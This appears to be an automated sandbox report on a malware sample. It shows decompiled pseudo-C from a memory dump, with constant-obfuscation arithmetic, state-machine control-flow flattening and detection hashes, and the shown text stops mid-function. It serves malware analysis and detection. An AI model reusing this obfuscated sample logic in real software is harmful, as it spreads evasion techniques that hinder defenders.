                                              0x002349aa
                                              0x002349d8
                                              0x002349dd
                                              0x00000000
                                              0x002349ac
                                              0x002349b2
                                              0x00000000
                                              0x002349b8
                                              0x002349b8
                                              0x00000000
                                              0x002349b8
                                              0x002349b2
                                              0x002349aa
                                              0x002349a2
                                              0x00000000
                                              0x00234996
                                              0x002347ff

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: +^$R.93$R.93$RESCDIR$dEH$l)
                                              • API String ID: 0-1973027218
                                              • Opcode ID: 6dae183150793ffe9c3d1d0d0277e954d08126b822ad90e5e8a4cc44d4105b4e
                                              • Instruction ID: a7a8737c1f04335abbcc317f846f63b155e8dbe4f1ae4459d29ac5cac7992b65
                                              • Opcode Fuzzy Hash: 6dae183150793ffe9c3d1d0d0277e954d08126b822ad90e5e8a4cc44d4105b4e
                                              • Instruction Fuzzy Hash: E80243B25083819FE368DF64C48AA5BFBE1FBC4314F108A1DE5D996260D7B49949CF43
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002302C3, Relevance: 7.7, Strings: 6, Instructions: 248COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 96%
                                              			E002302C3() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _t245;
				signed int _t247;
				void* _t249;
				signed int _t254;
				void* _t255;
				intOrPtr _t256;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t290;
				void* _t293;
				void* _t298;
				signed int* _t300;

				_t300 =  &_v676;
				_v580 = 0x66ae1;
				_v576 = 0xbd1a2;
				_v572 = 0x272c23;
				_t258 = 0x33;
				_t256 = 0;
				_t293 = 0x3b419076;
				_v568 = 0;
				_v640 = 0x1372;
				_v640 = _v640 / _t258;
				_v640 = _v640 | 0x4a3401ed;
				_v640 = _v640 ^ 0x4a34016d;
				_v660 = 0x5e98;
				_v660 = _v660 >> 0xe;
				_v660 = _v660 | 0x7267fa90;
				_t259 = 0x75;
				_v660 = _v660 / _t259;
				_v660 = _v660 ^ 0x00fa5318;
				_v652 = 0x5e75;
				_v652 = _v652 << 0x10;
				_v652 = _v652 + 0x48dc;
				_t260 = 0x18;
				_v652 = _v652 / _t260;
				_v652 = _v652 ^ 0x03efb4d1;
				_v608 = 0xe223;
				_t261 = 0x3f;
				_v608 = _v608 / _t261;
				_v608 = _v608 ^ 0x000070cc;
				_v656 = 0xb48f;
				_v656 = _v656 >> 6;
				_t262 = 0x3a;
				_v656 = _v656 / _t262;
				_v656 = _v656 + 0xde3a;
				_v656 = _v656 ^ 0x0000cbaf;
				_v612 = 0x15cc;
				_v612 = _v612 ^ 0x9ca6d169;
				_v612 = _v612 ^ 0x9ca6af9c;
				_v668 = 0xa8de;
				_v668 = _v668 << 5;
				_v668 = _v668 + 0xffff49ed;
				_t263 = 0x34;
				_v668 = _v668 / _t263;
				_v668 = _v668 ^ 0x00000193;
				_v596 = 0xe25b;
				_v596 = _v596 >> 4;
				_v596 = _v596 ^ 0x000030c3;
				_v636 = 0xc7ea;
				_v636 = _v636 << 0xa;
				_v636 = _v636 | 0x82c54243;
				_v636 = _v636 ^ 0x83dfaf9b;
				_v620 = 0x2a3e;
				_v620 = _v620 + 0xffff612f;
				_v620 = _v620 ^ 0xffffe842;
				_v644 = 0x52e;
				_t264 = 0x44;
				_v644 = _v644 * 0x2b;
				_v644 = _v644 + 0x1b45;
				_v644 = _v644 ^ 0x0000a38b;
				_v664 = 0x7c05;
				_v664 = _v664 / _t264;
				_v664 = _v664 + 0xfffff3de;
				_t265 = 0xd;
				_v664 = _v664 * 0x41;
				_v664 = _v664 ^ 0xfffd1fed;
				_v672 = 0x7153;
				_v672 = _v672 * 0x55;
				_v672 = _v672 + 0xffff3073;
				_v672 = _v672 | 0x19b2f735;
				_v672 = _v672 ^ 0x19b69e67;
				_v624 = 0x6a46;
				_v624 = _v624 << 6;
				_v624 = _v624 ^ 0x001a8e62;
				_v676 = 0x6586;
				_v676 = _v676 | 0x5a6bf539;
				_v676 = _v676 / _t265;
				_v676 = _v676 << 0xf;
				_v676 = _v676 ^ 0x4e5fab63;
				_v632 = 0x1a9f;
				_v632 = _v632 + 0x62a3;
				_v632 = _v632 ^ 0x000002a8;
				_v616 = 0x8464;
				_v616 = _v616 | 0x13bf265e;
				_v616 = _v616 ^ 0x13bfdd6d;
				_v592 = 0xbadb;
				_t266 = 0x3d;
				_t292 = _v632;
				_v592 = _v592 * 0x69;
				_v592 = _v592 ^ 0x004cce95;
				_v604 = 0xca90;
				_v604 = _v604 >> 0xc;
				_v604 = _v604 ^ 0x00007684;
				_v648 = 0x358b;
				_v648 = _v648 << 1;
				_v648 = _v648 << 9;
				_v648 = _v648 / _t266;
				_v648 = _v648 ^ 0x0003f328;
				_v600 = 0xe7dd;
				_v600 = _v600 ^ 0xaf509c9e;
				_v600 = _v600 ^ 0xaf5010b9;
				_v628 = 0xd224;
				_t245 = _v628;
				_t267 = 0x19;
				_t290 = _t245 % _t267;
				_v628 = _t245 / _t267;
				_v628 = _v628 ^ 0x00000864;
				do {
					while(_t293 != 0x47bbe06) {
						if(_t293 == 0xa25cde4) {
							_t249 = E0022F46D();
							_t298 = _v588 - _v548;
							asm("sbb ecx, [esp+0x94]");
							__eflags = _v584 - _t290;
							if(__eflags >= 0) {
								if(__eflags > 0) {
									L19:
									_t256 = 1;
									__eflags = 1;
								} else {
									__eflags = _t298 - _t249;
									if(_t298 >= _t249) {
										goto L19;
									}
								}
							}
						} else {
							if(_t293 == 0x13363d5d) {
								_t290 = _v604;
								_t267 = _v592;
								E0023AAAE(_t267, _t290, _v648,  &_v588, _v600);
								_t300 =  &(_t300[3]);
								_t293 = 0xa25cde4;
								continue;
							} else {
								if(_t293 == 0x1fdc46de) {
									_t290 = _v660;
									_t254 = E0022B566(_t267, _t290, _v656, _v612, _v640, _v668, _t267, _v596, _v636, _t256, _v620, _v644, _v628,  &_v524); // executed
									_t292 = _t254;
									_t300 =  &(_t300[0xc]);
									__eflags = _t254 - 0xffffffff;
									if(__eflags != 0) {
										_t293 = 0x47bbe06;
										continue;
									}
								} else {
									if(_t293 == 0x350fffd6) {
										_t290 =  &_v524;
										_t255 = E00233E3F(_t267, _t290, __eflags, _v652, _v608);
										_pop(_t267);
										__eflags = _t255;
										if(__eflags != 0) {
											_t293 = 0x1fdc46de;
											continue;
										}
									} else {
										if(_t293 != 0x3b419076) {
											goto L14;
										} else {
											_t293 = 0x350fffd6;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t256;
					}
					_push(_t267);
					_t247 = E00227F83( &_v564, _v664, _v672, _v624, _t292, _t267, _v676);
					_t290 = _v616;
					_t267 = _v632;
					asm("sbb esi, esi");
					_t293 = ( ~_t247 & 0xe3709c53) + 0x2fc5a10a; // executed
					__eflags = _t293;
					E00234F7D(_t267, _t290, _t292); // executed
					_t300 =  &(_t300[7]);
					L14:
					__eflags = _t293 - 0x2fc5a10a;
				} while (__eflags != 0);
				goto L20;
			}






















































                                              0x002302c3
                                              0x002302c9
                                              0x002302d3
                                              0x002302db
                                              0x002302e9
                                              0x002302ea
                                              0x002302ec
                                              0x002302f1
                                              0x002302f5
                                              0x00230305
                                              0x0023030b
                                              0x00230313
                                              0x0023031b
                                              0x00230323
                                              0x00230328
                                              0x00230334
                                              0x00230339
                                              0x0023033f
                                              0x00230347
                                              0x0023034f
                                              0x00230354
                                              0x00230360
                                              0x00230365
                                              0x0023036b
                                              0x00230373
                                              0x0023037f
                                              0x00230384
                                              0x0023038a
                                              0x00230392
                                              0x0023039a
                                              0x002303a3
                                              0x002303a8
                                              0x002303ae
                                              0x002303b6
                                              0x002303be
                                              0x002303c6
                                              0x002303ce
                                              0x002303d6
                                              0x002303de
                                              0x002303e3
                                              0x002303ef
                                              0x002303f2
                                              0x002303f6
                                              0x002303fe
                                              0x00230406
                                              0x0023040b
                                              0x00230413
                                              0x0023041b
                                              0x00230420
                                              0x00230428
                                              0x00230430
                                              0x00230438
                                              0x00230440
                                              0x00230448
                                              0x00230459
                                              0x00230461
                                              0x00230465
                                              0x0023046d
                                              0x00230475
                                              0x00230485
                                              0x00230489
                                              0x00230496
                                              0x00230499
                                              0x0023049d
                                              0x002304a5
                                              0x002304b2
                                              0x002304b6
                                              0x002304be
                                              0x002304c6
                                              0x002304ce
                                              0x002304d6
                                              0x002304db
                                              0x002304e3
                                              0x002304eb
                                              0x002304fb
                                              0x002304ff
                                              0x00230504
                                              0x0023050c
                                              0x00230514
                                              0x0023051c
                                              0x00230524
                                              0x0023052c
                                              0x00230534
                                              0x0023053c
                                              0x00230549
                                              0x0023054c
                                              0x00230550
                                              0x00230554
                                              0x0023055c
                                              0x00230564
                                              0x00230569
                                              0x00230571
                                              0x00230579
                                              0x0023057d
                                              0x0023058a
                                              0x0023058e
                                              0x00230596
                                              0x0023059e
                                              0x002305a6
                                              0x002305ae
                                              0x002305b6
                                              0x002305ba
                                              0x002305bb
                                              0x002305bd
                                              0x002305c1
                                              0x002305c9
                                              0x002305c9
                                              0x002305d7
                                              0x002306f4
                                              0x002306fd
                                              0x00230708
                                              0x0023070f
                                              0x00230711
                                              0x00230713
                                              0x00230719
                                              0x0023071b
                                              0x0023071b
                                              0x00230715
                                              0x00230715
                                              0x00230717
                                              0x00000000
                                              0x00000000
                                              0x00230717
                                              0x00230713
                                              0x002305dd
                                              0x002305e3
                                              0x0023068a
                                              0x0023068e
                                              0x00230692
                                              0x00230697
                                              0x0023069a
                                              0x00000000
                                              0x002305e9
                                              0x002305ef
                                              0x0023065f
                                              0x00230663
                                              0x00230668
                                              0x0023066a
                                              0x0023066d
                                              0x00230670
                                              0x00230676
                                              0x00000000
                                              0x00230676
                                              0x002305f1
                                              0x002305f7
                                              0x00230610
                                              0x0023061b
                                              0x00230621
                                              0x00230622
                                              0x00230624
                                              0x0023062a
                                              0x00000000
                                              0x0023062a
                                              0x002305f9
                                              0x002305ff
                                              0x00000000
                                              0x00230605
                                              0x00230605
                                              0x00000000
                                              0x00230605
                                              0x002305ff
                                              0x002305f7
                                              0x002305ef
                                              0x002305e3
                                              0x0023071f
                                              0x00230728
                                              0x00230728
                                              0x002306a4
                                              0x002306be
                                              0x002306c3
                                              0x002306c9
                                              0x002306d0
                                              0x002306d8
                                              0x002306d8
                                              0x002306de
                                              0x002306e3
                                              0x002306e6
                                              0x002306e6
                                              0x002306e6
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: #,'$#$Fj$Sq$[$u^
                                              • API String ID: 0-3347335214
                                              • Opcode ID: c47c2e617af9f90d504ce4957d9b81ea9ce1d44935f169193b34d947923a3a8b
                                              • Instruction ID: 08c2adc5081c70fd22943ec9be5d578ceb2bcbdd8db8ce794acadef711dc749c
                                              • Opcode Fuzzy Hash: c47c2e617af9f90d504ce4957d9b81ea9ce1d44935f169193b34d947923a3a8b
                                              • Instruction Fuzzy Hash: 8FB142725083819FE358CF64C98A40BFBE2BBC4758F108A1DF195562A0D7B99A59CF83
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0022EE78, Relevance: 5.2, Strings: 4, Instructions: 203COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 95%
                                              			E0022EE78() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				void* _t204;
				void* _t216;
				void* _t218;
				intOrPtr _t242;
				intOrPtr _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int* _t257;

				_t257 =  &_v1124;
				_v1056 = 0x181c5d;
				_v1052 = 0x367784;
				_t216 = 0x1144238d;
				_v1048 = 0x4ffcf6;
				_t248 = 0;
				_v1044 = 0;
				_v1088 = 0xda27;
				_t249 = 0x62;
				_v1088 = _v1088 * 0x3a;
				_t250 = 0x7a;
				_v1088 = _v1088 / _t249;
				_v1088 = _v1088 ^ 0x0000d2a1;
				_v1112 = 0x1719;
				_v1112 = _v1112 << 7;
				_v1112 = _v1112 + 0xffff2bf1;
				_v1112 = _v1112 | 0x98c770ba;
				_v1112 = _v1112 ^ 0x98cfba04;
				_v1096 = 0xeee5;
				_v1096 = _v1096 ^ 0xe08a058d;
				_v1096 = _v1096 | 0xf31efd60;
				_v1096 = _v1096 >> 0xd;
				_v1096 = _v1096 ^ 0x00079e87;
				_v1068 = 0x925f;
				_v1068 = _v1068 + 0xa627;
				_v1068 = _v1068 * 0xc;
				_v1068 = _v1068 ^ 0x000ee055;
				_v1076 = 0x1457;
				_v1076 = _v1076 * 0x3c;
				_t251 = 0x32;
				_v1076 = _v1076 / _t250;
				_v1076 = _v1076 ^ 0x00007f2a;
				_v1064 = 0x70c;
				_v1064 = _v1064 * 3;
				_v1064 = _v1064 ^ 0x000033a7;
				_v1080 = 0xbf13;
				_v1080 = _v1080 >> 0xf;
				_v1080 = _v1080 | 0xa6e1d279;
				_v1080 = _v1080 ^ 0xa6e18774;
				_v1072 = 0x855;
				_v1072 = _v1072 >> 6;
				_v1072 = _v1072 * 0x6d;
				_v1072 = _v1072 ^ 0x00004ced;
				_v1060 = 0x8e6f;
				_v1060 = _v1060 + 0xe76;
				_v1060 = _v1060 ^ 0x0000eeed;
				_v1116 = 0x7f13;
				_v1116 = _v1116 + 0x7bf9;
				_v1116 = _v1116 + 0xffffe522;
				_v1116 = _v1116 + 0x76b9;
				_v1116 = _v1116 ^ 0x000120a7;
				_v1124 = 0x4a8d;
				_v1124 = _v1124 + 0xb0fa;
				_t252 = 0x18;
				_v1124 = _v1124 / _t251;
				_v1124 = _v1124 ^ 0xe1689f92;
				_v1124 = _v1124 ^ 0xe168b829;
				_v1104 = 0x6fdc;
				_v1104 = _v1104 / _t252;
				_v1104 = _v1104 ^ 0xd1a01b12;
				_v1104 = _v1104 >> 0xd;
				_v1104 = _v1104 ^ 0x0006b7bc;
				_v1120 = 0x3441;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 | 0xb521b1d3;
				_v1120 = _v1120 ^ 0x6f352f49;
				_v1120 = _v1120 ^ 0xda14a570;
				_v1092 = 0xdaef;
				_v1092 = _v1092 + 0xffffef8f;
				_v1092 = _v1092 | 0x558b4159;
				_v1092 = _v1092 >> 0xb;
				_v1092 = _v1092 ^ 0x000a96bc;
				_v1084 = 0x9e65;
				_v1084 = _v1084 ^ 0xd37ef8f9;
				_t253 = 0x14;
				_v1084 = _v1084 / _t253;
				_v1084 = _v1084 ^ 0x0a9307fe;
				_v1100 = 0x36e3;
				_v1100 = _v1100 + 0xffff4219;
				_v1100 = _v1100 | 0x679c7357;
				_t254 = 0x3e;
				_v1100 = _v1100 * 0x7e;
				_v1100 = _v1100 ^ 0xffbf63c1;
				_v1108 = 0x25e;
				_v1108 = _v1108 / _t254;
				_v1108 = _v1108 | 0x82073b90;
				_v1108 = _v1108 * 0x30;
				_v1108 = _v1108 ^ 0x615b4461;
				do {
					while(_t216 != 0x295ca1) {
						if(_t216 == 0x1144238d) {
							_t216 = 0x274f9b22;
							continue;
						} else {
							if(_t216 == 0x1718f041) {
								E0022C0C6(_v1092, _v1084,  &_v1040, _v1100, _v1108); // executed
							} else {
								if(_t216 == 0x274f9b22) {
									E00233E3F(_t216,  &_v520, __eflags, _v1088, _v1112);
									_t216 = 0x295ca1;
									continue;
								} else {
									_t264 = _t216 - 0x3691f983;
									if(_t216 != 0x3691f983) {
										goto L10;
									} else {
										_push( &_v1040);
										_push( &_v520);
										E00227B63(_v1104, _v1120, _t264);
										_t248 =  !=  ? 1 : _t248;
										_t216 = 0x1718f041;
										continue;
									}
								}
							}
						}
						L13:
						return _t248;
					}
					_push(_v1068);
					_t204 = E0023889D(0x23c9b0, _v1096, __eflags);
					_pop(_t218);
					_t242 =  *0x23ca2c; // 0x4d8300
					_t176 = _t242 + 0x230; // 0x700047
					E0022C680(_t176, _v1064, _v1080, _t218, _v1072,  *0x23ca2c, _t204,  &_v1040);
					E00232025(_v1060, _t204, _v1116, _v1124);
					_t257 =  &(_t257[9]);
					_t216 = 0x3691f983;
					L10:
					__eflags = _t216 - 0x16e30c37;
				} while (__eflags != 0);
				goto L13;
			}






































                                              0x0022ee78
                                              0x0022ee7e
                                              0x0022ee88
                                              0x0022ee90
                                              0x0022ee95
                                              0x0022eea1
                                              0x0022eea3
                                              0x0022eea7
                                              0x0022eeb6
                                              0x0022eeb9
                                              0x0022eec3
                                              0x0022eec4
                                              0x0022eeca
                                              0x0022eed2
                                              0x0022eeda
                                              0x0022eedf
                                              0x0022eee7
                                              0x0022eeef
                                              0x0022eef7
                                              0x0022eeff
                                              0x0022ef07
                                              0x0022ef0f
                                              0x0022ef14
                                              0x0022ef1c
                                              0x0022ef24
                                              0x0022ef33
                                              0x0022ef37
                                              0x0022ef3f
                                              0x0022ef4c
                                              0x0022ef56
                                              0x0022ef57
                                              0x0022ef5d
                                              0x0022ef65
                                              0x0022ef74
                                              0x0022ef78
                                              0x0022ef80
                                              0x0022ef88
                                              0x0022ef8d
                                              0x0022ef95
                                              0x0022ef9d
                                              0x0022efa5
                                              0x0022efaf
                                              0x0022efb3
                                              0x0022efbb
                                              0x0022efc3
                                              0x0022efcb
                                              0x0022efd3
                                              0x0022efdb
                                              0x0022efe3
                                              0x0022efeb
                                              0x0022eff3
                                              0x0022effb
                                              0x0022f003
                                              0x0022f011
                                              0x0022f012
                                              0x0022f016
                                              0x0022f01e
                                              0x0022f028
                                              0x0022f038
                                              0x0022f03e
                                              0x0022f04b
                                              0x0022f055
                                              0x0022f05d
                                              0x0022f065
                                              0x0022f06a
                                              0x0022f072
                                              0x0022f07a
                                              0x0022f082
                                              0x0022f08a
                                              0x0022f092
                                              0x0022f09a
                                              0x0022f09f
                                              0x0022f0a7
                                              0x0022f0af
                                              0x0022f0bb
                                              0x0022f0c0
                                              0x0022f0c6
                                              0x0022f0ce
                                              0x0022f0d6
                                              0x0022f0de
                                              0x0022f0eb
                                              0x0022f0ec
                                              0x0022f0f0
                                              0x0022f0f8
                                              0x0022f106
                                              0x0022f10a
                                              0x0022f117
                                              0x0022f11b
                                              0x0022f123
                                              0x0022f123
                                              0x0022f12d
                                              0x0022f190
                                              0x00000000
                                              0x0022f12f
                                              0x0022f135
                                              0x0022f215
                                              0x0022f13b
                                              0x0022f13d
                                              0x0022f185
                                              0x0022f18c
                                              0x00000000
                                              0x0022f13f
                                              0x0022f13f
                                              0x0022f145
                                              0x00000000
                                              0x0022f14b
                                              0x0022f157
                                              0x0022f15f
                                              0x0022f160
                                              0x0022f16c
                                              0x0022f16f
                                              0x00000000
                                              0x0022f16f
                                              0x0022f145
                                              0x0022f13d
                                              0x0022f135
                                              0x0022f21d
                                              0x0022f229
                                              0x0022f229
                                              0x0022f194
                                              0x0022f1a1
                                              0x0022f1a6
                                              0x0022f1c2
                                              0x0022f1cc
                                              0x0022f1d2
                                              0x0022f1e5
                                              0x0022f1ea
                                              0x0022f1ed
                                              0x0022f1f2
                                              0x0022f1f2
                                              0x0022f1f2
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: I/5o$aD[a$6$L
                                              • API String ID: 0-1330720659
                                              • Opcode ID: 1b0bba7d448406666ede2745d443505c25697f1bccff73f4d904ca1d85d2cc10
                                              • Instruction ID: e37f493708a322a45e08cc5a683553eddc4a838e860a62783e813d87edb05022
                                              • Opcode Fuzzy Hash: 1b0bba7d448406666ede2745d443505c25697f1bccff73f4d904ca1d85d2cc10
                                              • Instruction Fuzzy Hash: 43914171118341EFD358CF65D48941BBBF6BBC4358F108A2EF19A96260C3B98A19CF83
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00227B63, Relevance: 2.7, Strings: 2, Instructions: 187COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 95%
                                              			E00227B63(void* __ecx, void* __edx, void* __eflags) {
				void* _t227;
				signed int _t253;
				signed int _t257;
				signed int _t258;
				void* _t279;
				void* _t280;

				_t279 = _t280 - 0x70;
				_push( *((intOrPtr*)(_t279 + 0x7c)));
				_push( *((intOrPtr*)(_t279 + 0x78)));
				_push(__edx);
				_push(__ecx);
				E0022602B(_t227);
				 *(_t279 + 0x5c) = 0x4f49;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) + 0xffff573d;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) >> 0xe;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) + 0xffff1f14;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) ^ 0x00031f13;
				 *(_t279 + 0x20) = 0x2d3b;
				 *(_t279 + 0x20) =  *(_t279 + 0x20) << 0xa;
				 *(_t279 + 0x20) =  *(_t279 + 0x20) ^ 0x00b4ea14;
				 *(_t279 + 0x38) = 0xada;
				_t257 = 0x56;
				 *(_t279 + 0x38) =  *(_t279 + 0x38) * 0xd;
				 *(_t279 + 0x38) =  *(_t279 + 0x38) ^ 0x7978ee92;
				 *(_t279 + 0x38) =  *(_t279 + 0x38) ^ 0x79786b80;
				 *(_t279 + 0x44) = 0x9fd0;
				 *(_t279 + 0x44) =  *(_t279 + 0x44) << 0xd;
				 *(_t279 + 0x44) =  *(_t279 + 0x44) + 0xffff90c4;
				 *(_t279 + 0x44) =  *(_t279 + 0x44) ^ 0x13f99f58;
				 *(_t279 + 0x28) = 0xbdd8;
				 *(_t279 + 0x28) =  *(_t279 + 0x28) / _t257;
				 *(_t279 + 0x28) =  *(_t279 + 0x28) ^ 0x65272766;
				 *(_t279 + 0x28) =  *(_t279 + 0x28) ^ 0x65270fe8;
				 *(_t279 + 0x24) = 0xa469;
				 *(_t279 + 0x24) =  *(_t279 + 0x24) * 0x47;
				 *(_t279 + 0x24) =  *(_t279 + 0x24) ^ 0x002db229;
				 *(_t279 + 0x48) = 0xdd17;
				 *(_t279 + 0x48) =  *(_t279 + 0x48) << 4;
				 *(_t279 + 0x48) =  *(_t279 + 0x48) >> 9;
				 *(_t279 + 0x48) =  *(_t279 + 0x48) ^ 0x00005398;
				 *(_t279 + 0x3c) = 0x840;
				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) ^ 0x7135c857;
				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) + 0xffffaa29;
				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) ^ 0x71355336;
				 *(_t279 + 0x34) = 0xe245;
				 *(_t279 + 0x34) =  *(_t279 + 0x34) ^ 0x5c1086b0;
				 *(_t279 + 0x34) =  *(_t279 + 0x34) << 0xc;
				 *(_t279 + 0x34) =  *(_t279 + 0x34) ^ 0x064f42a5;
				 *(_t279 + 0x68) = 0x7c59;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) >> 7;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) + 0xdfb1;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) >> 1;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) ^ 0x00006add;
				 *(_t279 + 0x1c) = 0x17b0;
				 *(_t279 + 0x1c) =  *(_t279 + 0x1c) * 0x33;
				 *(_t279 + 0x1c) =  *(_t279 + 0x1c) ^ 0x0004ea7a;
				 *(_t279 + 0xc) = 0x52de;
				 *(_t279 + 0xc) =  *(_t279 + 0xc) >> 3;
				 *(_t279 + 0xc) =  *(_t279 + 0xc) ^ 0x00000565;
				 *(_t279 + 0x14) = 0xa04a;
				 *(_t279 + 0x14) =  *(_t279 + 0x14) + 0x5b3d;
				 *(_t279 + 0x14) =  *(_t279 + 0x14) ^ 0x0000ad98;
				 *(_t279 + 0x10) = 0x88b9;
				 *(_t279 + 0x10) =  *(_t279 + 0x10) << 0xa;
				 *(_t279 + 0x10) =  *(_t279 + 0x10) ^ 0x0222fd12;
				 *(_t279 + 0x58) = 0x8451;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) << 1;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) + 0xffff44cb;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) + 0xffff231f;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) ^ 0xffff3ae7;
				 *(_t279 + 0x2c) = 0xa221;
				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) << 0xe;
				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) ^ 0x37ec24ae;
				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) ^ 0x1f641a26;
				 *(_t279 + 0x6c) = 0xb834;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) * 5;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) + 0xff22;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) + 0xffff2c65;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) ^ 0x00038cf7;
				 *(_t279 + 0x60) = 0x6d71;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) + 0xffff2e20;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) << 0xa;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) >> 7;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) ^ 0x01fcf6fe;
				 *(_t279 + 0x40) = 0xcc9d;
				 *(_t279 + 0x40) =  *(_t279 + 0x40) << 1;
				 *(_t279 + 0x40) =  *(_t279 + 0x40) | 0xa720d145;
				 *(_t279 + 0x40) =  *(_t279 + 0x40) ^ 0xa721d74b;
				 *(_t279 + 0x50) = 0xea3;
				 *(_t279 + 0x50) =  *(_t279 + 0x50) + 0x27fa;
				 *(_t279 + 0x50) =  *(_t279 + 0x50) >> 7;
				 *(_t279 + 0x50) =  *(_t279 + 0x50) ^ 0x00000071;
				 *(_t279 + 0x64) = 0xe156;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) + 0x8b10;
				_t258 = 0x77;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) / _t258;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) << 7;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) ^ 0x0001fc91;
				 *(_t279 + 0x54) = 0xb949;
				 *(_t279 + 0x54) =  *(_t279 + 0x54) ^ 0xe8c9a038;
				 *(_t279 + 0x54) =  *(_t279 + 0x54) * 0x53;
				 *(_t279 + 0x54) =  *(_t279 + 0x54) * 0x46;
				 *(_t279 + 0x54) =  *(_t279 + 0x54) ^ 0x24032f8e;
				 *(_t279 + 0x4c) = 0x8c7e;
				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) * 0x17;
				_t171 = _t279 - 0x14; // 0x68cf93e9
				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) << 5;
				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) ^ 0x0193ba3f;
				 *(_t279 + 0x30) = 0x8a4e;
				 *(_t279 + 0x30) =  *(_t279 + 0x30) << 0xc;
				 *(_t279 + 0x30) =  *(_t279 + 0x30) | 0xb22e72a5;
				 *(_t279 + 0x30) =  *(_t279 + 0x30) ^ 0xbaaee90f;
				 *(_t279 + 0x18) = 0x537b;
				 *(_t279 + 0x18) =  *(_t279 + 0x18) >> 0x10;
				 *(_t279 + 0x18) =  *(_t279 + 0x18) ^ 0x00002127;
				E002393A8( *(_t279 + 0x44),  *(_t279 + 0x28),  *(_t279 + 0x24), _t171, 0x1e,  *(_t279 + 0x48));
				_t193 = _t279 - 0x21c; // 0x68cf91e1
				E002393A8( *(_t279 + 0x3c),  *(_t279 + 0x34),  *(_t279 + 0x68), _t193, 0x208,  *(_t279 + 0x1c));
				_t198 = _t279 - 0x424; // 0x68cf8fd9
				E002393A8( *(_t279 + 0xc),  *(_t279 + 0x14),  *(_t279 + 0x10), _t198, 0x208,  *(_t279 + 0x58));
				_t202 = _t279 - 0x21c; // 0x68cf91e1
